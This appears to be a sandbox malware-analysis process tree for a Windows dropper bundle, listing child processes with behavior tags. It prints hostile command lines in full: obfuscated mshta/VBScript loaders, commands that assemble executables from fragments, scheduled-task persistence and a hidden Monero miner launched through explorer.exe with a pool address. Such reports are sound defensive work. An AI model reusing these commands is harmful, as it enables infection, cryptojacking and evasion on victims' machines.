- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe"C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\5743283.exe"C:\Users\Admin\AppData\Roaming\5743283.exe"8⤵
-
C:\Users\Admin\AppData\Roaming\7008547.exe"C:\Users\Admin\AppData\Roaming\7008547.exe"8⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\7646913.exe"C:\Users\Admin\AppData\Roaming\7646913.exe"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\8412671.exe"C:\Users\Admin\AppData\Roaming\8412671.exe"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\6766431.exe"C:\Users\Admin\AppData\Roaming\6766431.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBscrIPT: CLose( cREaTeobJEcT ( "WscRipT.SHelL" ).rUN( "CMD.exe /Q /R cOPy /Y ""C:\Users\Admin\AppData\Roaming\6766431.exe"" ..\UpJnOk3Yn_BZ21.EXe&&STARt ..\UPJnOK3YN_bz21.EXE /p046ZeOV5fN93E5 & iF """"== """" for %m IN ( ""C:\Users\Admin\AppData\Roaming\6766431.exe"" ) do taskkill /F /IM ""%~nXm"" ", 0 , TRue ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /R cOPy /Y "C:\Users\Admin\AppData\Roaming\6766431.exe" ..\UpJnOk3Yn_BZ21.EXe&&STARt ..\UPJnOK3YN_bz21.EXE /p046ZeOV5fN93E5 & iF ""== "" for %m IN ( "C:\Users\Admin\AppData\Roaming\6766431.exe" ) do taskkill /F /IM "%~nXm"10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM "6766431.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Roaming\7933285.exe"C:\Users\Admin\AppData\Roaming\7933285.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 2968⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\chrome.exe"C:\Users\Admin\AppData\Local\Temp\chrome.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\chrome update.exe"C:\Users\Admin\AppData\Local\Temp\chrome update.exe"7⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7040 -s 17248⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"10⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"12⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "13⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC13⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\chrome1.exe"C:\Users\Admin\AppData\Local\Temp\chrome1.exe"7⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5048 -s 17248⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\jingli-game.exe"C:\Users\Admin\AppData\Local\Temp\jingli-game.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"7⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 2609⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"7⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe10⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"11⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"12⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"13⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat162b769f285d4a78.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat162b769f285d4a78.exeSat162b769f285d4a78.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\6836899.exe"C:\Users\Admin\AppData\Roaming\6836899.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\856814.exe"C:\Users\Admin\AppData\Roaming\856814.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\7690304.exe"C:\Users\Admin\AppData\Roaming\7690304.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\5377420.exe"C:\Users\Admin\AppData\Roaming\5377420.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\4172725.exe"C:\Users\Admin\AppData\Roaming\4172725.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\8379179.exe"C:\Users\Admin\AppData\Roaming\8379179.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\859422.exe"C:\Users\Admin\AppData\Roaming\859422.exe"6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBscrIPT: CLose( cREaTeobJEcT ( "WscRipT.SHelL" ).rUN( "CMD.exe /Q /R cOPy /Y ""C:\Users\Admin\AppData\Roaming\859422.exe"" ..\UpJnOk3Yn_BZ21.EXe&&STARt ..\UPJnOK3YN_bz21.EXE /p046ZeOV5fN93E5 & iF """"== """" for %m IN ( ""C:\Users\Admin\AppData\Roaming\859422.exe"" ) do taskkill /F /IM ""%~nXm"" ", 0 , TRue ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /R cOPy /Y "C:\Users\Admin\AppData\Roaming\859422.exe" ..\UpJnOk3Yn_BZ21.EXe&&STARt ..\UPJnOK3YN_bz21.EXE /p046ZeOV5fN93E5 & iF ""== "" for %m IN ( "C:\Users\Admin\AppData\Roaming\859422.exe" ) do taskkill /F /IM "%~nXm"8⤵
-
C:\Users\Admin\AppData\Local\Temp\UpJnOk3Yn_BZ21.EXe..\UPJnOK3YN_bz21.EXE /p046ZeOV5fN93E59⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBscrIPT: CLose( cREaTeobJEcT ( "WscRipT.SHelL" ).rUN( "CMD.exe /Q /R cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\UpJnOk3Yn_BZ21.EXe"" ..\UpJnOk3Yn_BZ21.EXe&&STARt ..\UPJnOK3YN_bz21.EXE /p046ZeOV5fN93E5 & iF ""/p046ZeOV5fN93E5 ""== """" for %m IN ( ""C:\Users\Admin\AppData\Local\Temp\UpJnOk3Yn_BZ21.EXe"" ) do taskkill /F /IM ""%~nXm"" ", 0 , TRue ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /R cOPy /Y "C:\Users\Admin\AppData\Local\Temp\UpJnOk3Yn_BZ21.EXe" ..\UpJnOk3Yn_BZ21.EXe&&STARt ..\UPJnOK3YN_bz21.EXE /p046ZeOV5fN93E5 & iF "/p046ZeOV5fN93E5 "== "" for %m IN ( "C:\Users\Admin\AppData\Local\Temp\UpJnOk3Yn_BZ21.EXe" ) do taskkill /F /IM "%~nXm"11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscRiPt: cLoSE ( crEaTeobjECt ("wsCriPt.shElL" ).Run("cMD /q /R eCHo | set /P = ""MZ"" > 1U6QCJ.0ZQ & coPy /Y /B 1U6QcJ.0ZQ + ~M8QTK6.LG +2RWpCG7b.N + QDVQ.nb + NTzZxd.SX ..\5UJAEP._~0 &DeL /Q *& STaRT control.exe ..\5UJAEP._~0 " , 0 , tRUe ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R eCHo | set /P = "MZ" > 1U6QCJ.0ZQ &coPy /Y /B 1U6QcJ.0ZQ + ~M8QTK6.LG+2RWpCG7b.N +QDVQ.nb + NTzZxd.SX ..\5UJAEP._~0 &DeL /Q *& STaRT control.exe ..\5UJAEP._~011⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>1U6QCJ.0ZQ"12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "12⤵
-
C:\Windows\SysWOW64\control.execontrol.exe ..\5UJAEP._~012⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\5UJAEP._~013⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\5UJAEP._~014⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\5UJAEP._~015⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM "859422.exe"9⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat16862c2e159d0a4.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16862c2e159d0a4.exeSat16862c2e159d0a4.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt: cLosE( CReATeObJEcT ("WsCripT.sHELl" ).RUN( "CmD /r copy /Y ""C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16862c2e159d0a4.exe"" ..\TyIOGZL_DGrJm.EXe && sTArT ..\TyIoGZL_DGRJm.EXe /pndRQSTDuB4kW8vOCUOVSE &IF """" == """" for %t iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16862c2e159d0a4.exe"" ) do taskkill -iM ""%~nxt"" /f", 0 ,tRUE ))6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r copy /Y "C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16862c2e159d0a4.exe" ..\TyIOGZL_DGrJm.EXe &&sTArT ..\TyIoGZL_DGRJm.EXe /pndRQSTDuB4kW8vOCUOVSE&IF "" == "" for %t iN ( "C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat16862c2e159d0a4.exe" ) do taskkill -iM "%~nxt" /f7⤵
-
C:\Users\Admin\AppData\Local\Temp\TyIOGZL_DGrJm.EXe..\TyIoGZL_DGRJm.EXe /pndRQSTDuB4kW8vOCUOVSE8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt: cLosE( CReATeObJEcT ("WsCripT.sHELl" ).RUN( "CmD /r copy /Y ""C:\Users\Admin\AppData\Local\Temp\TyIOGZL_DGrJm.EXe"" ..\TyIOGZL_DGrJm.EXe && sTArT ..\TyIoGZL_DGRJm.EXe /pndRQSTDuB4kW8vOCUOVSE &IF ""/pndRQSTDuB4kW8vOCUOVSE"" == """" for %t iN ( ""C:\Users\Admin\AppData\Local\Temp\TyIOGZL_DGrJm.EXe"" ) do taskkill -iM ""%~nxt"" /f", 0 ,tRUE ))9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r copy /Y "C:\Users\Admin\AppData\Local\Temp\TyIOGZL_DGrJm.EXe" ..\TyIOGZL_DGrJm.EXe &&sTArT ..\TyIoGZL_DGRJm.EXe /pndRQSTDuB4kW8vOCUOVSE&IF "/pndRQSTDuB4kW8vOCUOVSE" == "" for %t iN ( "C:\Users\Admin\AppData\Local\Temp\TyIOGZL_DGrJm.EXe" ) do taskkill -iM "%~nxt" /f10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbscRIpT: CLose(CreATeobJeCt ( "WsCrIpt.SHELL" ). run ("CMd /r ecHO M4%raNdom%Dh> _nV2ETiC.R5 & ECHO | set /P = ""MZ"" > qDz2EUwL.Nn & COpy /b /Y QDz2EUwL.NN + Wz3EN0Ra.r + YAwLKSHG.Nt + 1LRWb.UIm + MmIK6j.ACI +_nV2ETiC.R5 ..\XHtD~USv.J & staRt control ..\xHTD~USV.J & del /Q * " , 0 , True ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r ecHO M4%raNdom%Dh> _nV2ETiC.R5 & ECHO | set /P = "MZ" > qDz2EUwL.Nn & COpy /b /Y QDz2EUwL.NN + Wz3EN0Ra.r + YAwLKSHG.Nt+ 1LRWb.UIm +MmIK6j.ACI +_nV2ETiC.R5 ..\XHtD~USv.J & staRt control ..\xHTD~USV.J & del /Q *10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>qDz2EUwL.Nn"11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECHO "11⤵
-
C:\Windows\SysWOW64\control.execontrol ..\xHTD~USV.J11⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\xHTD~USV.J12⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\xHTD~USV.J13⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "Sat16862c2e159d0a4.exe" /f8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat169c60f22b8.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat169c60f22b8.exeSat169c60f22b8.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-7O1B4.tmp\Sat169c60f22b8.tmp"C:\Users\Admin\AppData\Local\Temp\is-7O1B4.tmp\Sat169c60f22b8.tmp" /SL5="$20168,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat169c60f22b8.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat169c60f22b8.exe"C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat169c60f22b8.exe" /SILENT7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-70MBQ.tmp\Sat169c60f22b8.tmp"C:\Users\Admin\AppData\Local\Temp\is-70MBQ.tmp\Sat169c60f22b8.tmp" /SL5="$30168,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat169c60f22b8.exe" /SILENT8⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-EUKE1.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-EUKE1.tmp\postback.exe" ss19⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat1600f41eca.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat1600f41eca.exeSat1600f41eca.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\AhWVemGiKw7SpgUWHHpZkjyt.exe"C:\Users\Admin\Pictures\Adobe Films\AhWVemGiKw7SpgUWHHpZkjyt.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\WBGMEjP2ZOPhKrFm3D2PsxK2.exe"C:\Users\Admin\Pictures\Adobe Films\WBGMEjP2ZOPhKrFm3D2PsxK2.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 2887⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\8sTAAiYk2sEOrXXjfesKoFdn.exe"C:\Users\Admin\Pictures\Adobe Films\8sTAAiYk2sEOrXXjfesKoFdn.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\8sTAAiYk2sEOrXXjfesKoFdn.exe"C:\Users\Admin\Pictures\Adobe Films\8sTAAiYk2sEOrXXjfesKoFdn.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\bdsbfds.exe"C:\Users\Admin\AppData\Local\Temp\bdsbfds.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\clip.exe"C:\Users\Admin\AppData\Local\Temp\clip.exe"8⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\Pictures\Adobe Films\OLyCAAaDhlJD4xz9ygf7NwsA.exe"C:\Users\Admin\Pictures\Adobe Films\OLyCAAaDhlJD4xz9ygf7NwsA.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\J9zM_BwL31SvyQCz441NjFE2.exe"C:\Users\Admin\Pictures\Adobe Films\J9zM_BwL31SvyQCz441NjFE2.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\inst2.exe"C:\Program Files (x86)\Company\NewProduct\inst2.exe"7⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Users\Admin\Pictures\Adobe Films\5X4Z1tG8vqSmImDuhk43ndKc.exe"C:\Users\Admin\Pictures\Adobe Films\5X4Z1tG8vqSmImDuhk43ndKc.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1100 -s 2967⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\fBp6HqC0_TNfSR_tIpttHvQC.exe"C:\Users\Admin\Pictures\Adobe Films\fBp6HqC0_TNfSR_tIpttHvQC.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\fBp6HqC0_TNfSR_tIpttHvQC.exe"C:\Users\Admin\Pictures\Adobe Films\fBp6HqC0_TNfSR_tIpttHvQC.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\7PEDuinOLwXYX_6iGkQn8Cc8.exe"C:\Users\Admin\Pictures\Adobe Films\7PEDuinOLwXYX_6iGkQn8Cc8.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\9Thnn_NJVuhARrG07i9nwHb1.exe"C:\Users\Admin\Documents\9Thnn_NJVuhARrG07i9nwHb1.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\bFnTrTAo0k_bDjinTCLMwvzb.exe"C:\Users\Admin\Pictures\Adobe Films\bFnTrTAo0k_bDjinTCLMwvzb.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\41QX82bYGlA3Bkj6dsFQtiUV.exe"C:\Users\Admin\Pictures\Adobe Films\41QX82bYGlA3Bkj6dsFQtiUV.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 720 -s 2769⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\vg9O1s8jU7nNIaD25edzyuif.exe"C:\Users\Admin\Pictures\Adobe Films\vg9O1s8jU7nNIaD25edzyuif.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2192 -s 3009⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\YhgrWEcmKvKICpB75ltxZDUA.exe"C:\Users\Admin\Pictures\Adobe Films\YhgrWEcmKvKICpB75ltxZDUA.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\s9hCztd94a_wFOSLvsJOv4Qf.exe"C:\Users\Admin\Pictures\Adobe Films\s9hCztd94a_wFOSLvsJOv4Qf.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\s9hCztd94a_wFOSLvsJOv4Qf.exe"C:\Users\Admin\Pictures\Adobe Films\s9hCztd94a_wFOSLvsJOv4Qf.exe" -u9⤵
-
C:\Users\Admin\Pictures\Adobe Films\OblbIZVPY7a0tO5Oh7yjmZQL.exe"C:\Users\Admin\Pictures\Adobe Films\OblbIZVPY7a0tO5Oh7yjmZQL.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--cSExK3QD"10⤵
-
